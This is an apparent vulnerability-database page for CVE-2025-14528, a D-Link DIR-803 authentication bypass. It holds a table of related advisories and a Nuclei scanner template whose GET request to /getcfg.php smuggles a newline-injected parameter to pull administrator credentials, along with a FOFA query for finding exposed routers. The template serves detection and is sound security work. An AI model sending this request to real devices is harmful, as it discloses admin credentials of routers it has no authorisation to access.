| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2025-14528 | 11 Dec 202517:39 | – | circl | |
| D-Link DIR-803 安全漏洞 | 11 Dec 202500:00 | – | cnnvd | |
| D-Link DIR-803 Information Disclosure Vulnerability | 18 Dec 202500:00 | – | cnvd | |
| CVE-2025-14528 | 11 Dec 202517:02 | – | cve | |
| CVE-2025-14528 D-Link DIR-803 Configuration getcfg.php information disclosure | 11 Dec 202517:02 | – | cvelist | |
| EUVD-2025-202757 | 11 Dec 202517:02 | – | euvd | |
| Jinher OA - SQL Injection | 6 Jul 202603:02 | – | nuclei | |
| CVE-2025-14528 | 11 Dec 202517:15 | – | nvd | |
| CVE-2025-14528 | 11 Dec 202517:15 | – | osv | |
| PT-2025-50639 | 11 Dec 202500:00 | – | ptsecurity |
id: CVE-2025-14528
info:
name: D-Link DIR-803 - Authentication Bypass
author: DhiyaneshDk
severity: high
description: |
An authentication bypass vulnerability exists in D-Link DIR-803 routers (firmware A1 1.04 and earlier). By manipulating the AUTHORIZED_GROUP parameter in /getcfg.php via newline injection, an attacker can retrieve XML configuration containing administrator credentials without authentication.
impact: |
Remote attackers can disclose sensitive information, potentially compromising device confidentiality.
remediation: |
Upgrade to the latest supported version or replace the device as it is no longer maintained.
reference:
- https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
- https://vuldb.com/?id.335869
- https://nvd.nist.gov/vuln/detail/CVE-2025-14528
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2025-14528
epss-score: 0.03559
epss-percentile: 0.87927
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
fofa-query: app="D_Link-DIR-803"
tags: cve,cve2025,d-link,dir,auth-bypass,disclosure,vkev
http:
- raw:
- |
GET /getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<entry>"
- "<account>"
- "<group>"
condition: and
- type: word
part: content_type
words:
- "text/xml"
- type: status
status:
- 200
# digest: 4a0a004730450220643c74149609559c459db0e22f7a3165c0f55bff14a178f566dcf26fac84bd0e022100a86133da5140bc5da9c268a3784485af4efd9c7aa00496cb4c70b59d5e643379:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation